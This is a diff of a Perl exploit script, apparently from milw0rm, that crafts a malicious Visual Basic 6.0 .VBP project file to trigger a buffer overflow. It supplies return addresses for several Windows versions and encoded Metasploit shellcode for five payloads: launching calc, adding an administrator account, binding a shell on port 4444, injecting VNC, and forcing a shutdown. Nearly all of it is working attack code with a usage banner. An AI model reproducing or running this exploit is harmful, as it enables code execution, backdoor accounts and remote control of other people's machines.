-	   "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x58".
-	   "\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48".
-	   "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
-	   "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
-	   "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48".
-	   "\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54".
-	   "\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58".
-	   "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x33\x4b\x4d".
-	   "\x46\x46\x4b\x48\x43\x34\x42\x53\x4b\x58\x42\x54\x4e\x30\x4b\x48".
-	   "\x42\x57\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x50\x50\x45\x4a\x46".
-	   "\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46".
-	   "\x43\x45\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x37".
-	   "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
-	   "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e".
-	   "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x36\x44\x50".
-	   "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
-	   "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x55\x43\x54".
-	   "\x43\x45\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x31".
-	   "\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a".
-	   "\x4c\x41\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x31".
-	   "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
-	   "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d".
-	   "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d".
-	   "\x42\x45\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x36".
-	   "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
-	   "\x4f\x4f\x42\x4d\x48\x56\x4c\x36\x46\x56\x48\x46\x4a\x36\x43\x46".
-	   "\x4d\x36\x49\x38\x45\x4e\x4c\x46\x42\x35\x49\x45\x49\x32\x4e\x4c".
-	   "\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c".
-	   "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42".
-	   "\x43\x59\x4d\x38\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
-	   "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
-	   "\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x35\x41\x45\x41\x55\x4c\x46".
-	   "\x41\x30\x41\x45\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x36".
-	   "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
-	   "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f".
-	   "\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
-	   "\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x45\x4f\x4f\x48\x4d".
-	   "\x4f\x4f\x42\x4d\x5a";
-
-# win32_bind_vncinject -  VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
-$shellc4 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50".
-	   "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36".
-	   "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30".
-	   "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55".
-	   "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33".
-	   "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c".
-	   "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30".
-	   "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51".
-	   "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56".
-	   "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e".
-	   "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43".
-	   "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50".
-	   "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38".
-	   "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58".
-	   "\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e".
-	   "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50".
-	   "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e".
-	   "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50".
-	   "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e".
-	   "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c".
-	   "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a".
-	   "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45".
-	   "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55".
-	   "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47".
-	   "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43".
-	   "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48".
-	   "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f".
-	   "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55".
-	   "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48".
-	   "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50".
-	   "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55".
-	   "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32".
-	   "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c".
-	   "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e".
-	   "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35".
-	   "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30".
-	   "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";
-
-# win32_exec -  EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com
-$shellc5 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-	   "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-	   "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x48".
-	   "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x48".
-	   "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-	   "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
-	   "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x38".
-	   "\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34".
-	   "\x4b\x38\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x48".
-	   "\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x43".
-	   "\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x43\x45\x58\x42\x4c\x4a\x37".
-	   "\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x4e\x51\x4d\x4a".
-	   "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b".
-	   "\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x45\x41\x53".
-	   "\x48\x4f\x42\x36\x48\x35\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
-	   "\x42\x45\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x56\x4a\x39".
-	   "\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x37\x4a\x56".
-           "\x45\x47\x46\x37\x46\x46\x4f\x36\x47\x37\x50\x46\x42\x42\x4d\x42".
-	   "\x43\x36\x42\x42\x44\x42\x4a\x34\x41\x54\x49\x34\x42\x42\x48\x35".
-	   "\x45\x34\x50\x56\x42\x33\x4d\x56\x42\x52\x42\x57\x47\x57\x50\x56".
-	   "\x43\x33\x46\x36\x42\x32\x4c\x46\x42\x33\x42\x33\x44\x37\x42\x32".
-	   "\x44\x46\x42\x53\x4a\x57\x42\x33\x44\x47\x42\x52\x47\x47\x49\x56".
-	   "\x48\x46\x42\x52\x4b\x56\x42\x33\x43\x57\x4a\x56\x41\x53\x42\x32".
-	   "\x45\x37\x42\x32\x44\x56\x41\x43\x46\x37\x43\x46\x4a\x56\x44\x32".
-	   "\x42\x30\x5a";
-
-$endQuote = "\x22";
-
-$i = $ARGV[0];
-
-
-if ($i==1){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi";
-exit;
-}
-
-
-if ($i==2){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi";
-exit;
-}
-
-
-if ($i==3){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi";
-exit;
-}
-
-
-if ($i==4){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi";
-exit;
-}
-
-
-if ($i==5){
-print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi";
-exit;
-}
-
-
-print "\n";
-print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print " +++                                                        +++\n";
-print " +++                                                        +++\n";
-print " +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++\n";
-print " +++ Written By Koshi                                       +++\n";
-print " +++ Greets: Rima my baby! Draven, thanks for helping.      +++\n";
-print " +++                                                        +++\n";
-print " +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp                   +++\n";
-print " +++                                                        +++\n";
-print " +++  Options:                                              +++\n";
-print " +++          1 - win32_exec CALC.EXE                       +++\n";
-print " +++          2 - win32_adduser Pass=4dmin User=koshi       +++\n";
-print " +++          3 - win32_bind Port 4444                      +++\n";
-print " +++          4 - win32_bind_vncinject Port 5900            +++\n";
-print " +++          5 - win32_exec shutdown -c \x22HAI VEn0m pw..    +++\n";
-print " +++                                                        +++\n";
-print " +++                                                        +++\n";
-print " +++ Notes: Ship final .VBP file with a .FRM file to avoid  +++\n";
-print " +++        warnings in Visual Basic 6.0                    +++\n";
-print " +++                                                        +++\n";
-print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-
-
-
-
-
-
-exit;
-
-
-#EOF
-
-# milw0rm.com [2007-09-04]
+#!/usr/bin/perl
+#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++
+#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#'++ Author: Koshi                                      +
+#'++ Email: heykoshi at gmail dot com                   +
+#'++ Application: Microsoft Visual Basic 6.0            +
+#'++                                                    +
+#'++ Tested on Microsoft Windows XP Home Edition SP2    +
+#'++ Patched & Updated                                  +
+#'++                                                    +
+#'++ The vulnerable buffer exsists in the .VBP files of +
+#'++ Visual Basic projects. You can jump directly to    +
+#'++ the shellcode, or jump to it via EBP.              +
+#'++                                                    +
+#'++ There is NO restriction of shellcode size either.  +
+#'++                                                    +
+#'++ Gr33tz: Rima my baby who I love and adore, Draven  +
+#'++ for pointing me in the right direction, as always. +
+#'++                                                    +
+#'++                                                    +
+#'++ This exploit is for educational use only, blah.    +
+#'++                                                    +
+#'++                                                    +
+#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#'+++++++++++++++++++++++++++++++++++++++++++++++++++++
+#
+# Ex. of Usage:
+# perl vb6.pl 1 >>Project.vbp
+# 
+#
+$begin0 = "\x54\x79\x70\x65\x3D\x45\x78\x65\x0D\x0A\x46\x6F\x72\x6D".
+	  "\x3D\x46\x6F\x72\x6D\x31\x2E\x66\x72\x6D\x0D\x0A";
+
+$begin1 = "\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x3D".
+	  "\x2A\x5C\x47\x7B\x30\x30\x30\x32\x30\x34\x33\x30\x2D\x30".
+          "\x30\x30\x30\x2D\x30\x30\x30\x30\x2D\x43\x30\x30\x30\x2D".
+          "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x36\x7D\x23".
+          "\x32\x2E\x30\x23\x30\x23\x2E\x2E\x5C\x2E\x2E\x5C\x2E\x2E".
+          "\x5C\x2E\x2E\x5C\x2E\x2E\x5C\x57\x49\x4E\x44\x4F\x57\x53".
+          "\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x74\x64\x6F".
+          "\x6C\x65\x32\x2E\x74\x6C\x62\x23\x4F\x4C\x45\x20\x41\x75".
+          "\x74\x6F\x6D\x61\x74\x69\x6F\x6E";
+
+$begin2 = "\x0D\x0A\x53\x74\x61\x72\x74\x75\x70\x3D\x22\x46\x6F\x72\x6D\x31\x22\x0D\x0A".
+          "\x43\x6F\x6D\x6D\x61\x6E\x64\x33\x32\x3D\x22\x22";
+
+$BuffOf = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+	  "\x41\x41\x41\x41";
+
+$codeAddr = "\x83\x25\x40\x01";
+# You can most likely use a call or a push, you could probably use them from kernel32.dll too.
+#* ntdll.dll    - 0x7C923DA3      jmp Ebp **** Is the one i have used in this example.
+# 0x77f6d42f  	jmp ebp   	ntdll.dll  (English / 5.2.3790.3) 	Windows 2003 Server 5.2.0.0 SP0 (IA32)
+# 0x77f7d9b6 	jmp ebp 	ntdll.dll  (English / 5.1.2600.11061) 	Windows XP 5.1.1.0 SP1 (IA32)
+# 0x77f8c449 	jmp ebp 	ntdll.dll  (English / 5.0.2163.1) 	Windows 2000 5.0.0.0 SP0 (IA32)
+# 0x77faa6ce 	jmp ebp 	ntdll.dll  (English / 5.2.3790.3) 	Windows 2003 Server 5.2.0.0 SP0 (IA32)
+# 0x7c85eb73 	jmp ebp 	ntdll.dll  (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
+# 0x7c8839ed 	jmp ebp 	ntdll.dll  (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32)
+#*0x7c923da3 	jmp ebp 	ntdll.dll  (English / 5.1.2600.21802) 	Windows XP 5.1.2.0 SP2 (IA32)
+# 0x77f8c449 	jmp ebp   	ntdll.dll  (French / 5.0.2163.1) 	Windows 2000 5.0.0.0 SP0 (IA32)
+# 0x77f6d9b6  	jmp ebp   	ntdll.dll  (German / 5.1.2600.11061) 	Windows XP 5.1.1.0 SP1 (IA32)
+# 0x7c933da3 	jmp ebp  	ntdll.dll  (German / 5.1.2600.21802) 	Windows XP 5.1.2.0 SP2 (IA32)
+# 0x77f5d42f  	jmp ebp   	ntdll.dll  (Italian / 5.2.3790.3) 	No associated versions
+# 0x77f6d9b6 	jmp ebp 	ntdll.dll  (Italian / 5.1.2600.11061) 	Windows XP 5.1.1.0 SP1 (IA32)
+# 0x77f8c449 	jmp ebp 	ntdll.dll  (Italian / 5.0.2163.1) 	Windows 2000 5.0.0.0 SP0 (IA32)
+# 0x77f9a6ce 	jmp ebp 	ntdll.dll  (Italian / 5.2.3790.3) 	No associated versions
+# 0x7c96eb73 	jmp ebp 	ntdll.dll  (Italian / 5.2.3790.1830031)	No associated versions
+# 0x7c9939ed 	jmp ebp 	ntdll.dll  (Italian / 5.2.3790.1830031)	No associated versions
+# ...backwards..if you don't know why, then gtfo.
+$jmpEbp = "\xA3\x3D\x92\x7C";
+$fourSkin = "\x44\x44\x44\x44";
+
+
+$begin3 = "\x0D\x0A\x4E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x6A\x65\x63".
+	  "\x74\x31\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+          "\x41\x41\x41\x41\x41\x41\x41\x41";
+
+$koshi = "\x0D\x0A\x48\x65\x6C\x70\x43\x6F\x6E\x74\x65\x78\x74\x49\x44\x3D\x22\x30\x22\x0D\x0A\x43\x6F\x6D".
+	 "\x70\x61\x74\x69\x62\x6C\x65\x4D\x6F\x64\x65\x3D\x22\x30\x22\x0D\x0A\x4D\x61\x6A\x6F\x72\x56\x65".
+	 "\x72\x3D\x31\x0D\x0A\x4D\x69\x6E\x6F\x72\x56\x65\x72\x3D\x30\x0D\x0A\x52\x65\x76\x69\x73\x69\x6F".
+	 "\x6E\x56\x65\x72\x3D\x30\x0D\x0A\x41\x75\x74\x6F\x49\x6E\x63\x72\x65\x6D\x65\x6E\x74\x56\x65\x72".
+	 "\x3D\x30\x0D\x0A\x53\x65\x72\x76\x65\x72\x53\x75\x70\x70\x6F\x72\x74\x46\x69\x6C\x65\x73\x3D\x30".
+	 "\x0D\x0A\x43\x6F\x6D\x70\x69\x6C\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x4F\x70\x74".
+	 "\x69\x6D\x69\x7A\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x46\x61\x76\x6F\x72\x50\x65".
+	 "\x6E\x74\x69\x75\x6D\x50\x72\x6F\x28\x74\x6D\x29\x3D\x30\x0D\x0A\x43\x6F\x64\x65\x56\x69\x65\x77".
+	 "\x44\x65\x62\x75\x67\x49\x6E\x66\x6F\x3D\x30\x0D\x0A\x4E\x6F\x41\x6C\x69\x61\x73\x69\x6E\x67\x3D".
+	 "\x30\x0D\x0A\x42\x6F\x75\x6E\x64\x73\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x4F\x76\x65\x72\x66\x6C".
+	 "\x6F\x77\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x46\x6C\x50\x6F\x69\x6E\x74\x43\x68\x65\x63\x6B\x3D".
+	 "\x30\x0D\x0A\x46\x44\x49\x56\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x55\x6E\x72\x6F\x75\x6E\x64\x65".
+	 "\x64\x46\x50\x3D\x30\x0D\x0A\x53\x74\x61\x72\x74\x4D\x6F\x64\x65\x3D\x30\x0D\x0A\x55\x6E\x61\x74".
+	 "\x74\x65\x6E\x64\x65\x64\x3D\x30\x0D\x0A\x52\x65\x74\x61\x69\x6E\x65\x64\x3D\x30\x0D\x0A\x54\x68".
+	 "\x72\x65\x61\x64\x50\x65\x72\x4F\x62\x6A\x65\x63\x74\x3D\x30\x0D\x0A\x4D\x61\x78\x4E\x75\x6D\x62".
+	 "\x65\x72\x4F\x66\x54\x68\x72\x65\x61\x64\x73\x3D\x31\x0D\x0A\x0D\x0A\x5B\x4D\x53\x20\x54\x72\x61".
+	 "\x6E\x73\x61\x63\x74\x69\x6F\x6E\x20\x53\x65\x72\x76\x65\x72\x5D\x0D\x0A\x41\x75\x74\x6F\x52\x65".
+	 "\x66\x72\x65\x73\x68\x3D\x31\x0D\x0A";
+
+# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
+$shellc1 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+  	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". 
+	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+	   "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47".
+	   "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38".
+	   "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48".
+	   "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
+	   "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
+	   "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
+	   "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44".
+	   "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38".
+	   "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+	   "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47".
+  	   "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a".
+	   "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
+	   "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33".
+	   "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
+	   "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59".
+	   "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56".
+	   "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a";
+
+# win32_adduser -  PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com
+$shellc2 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
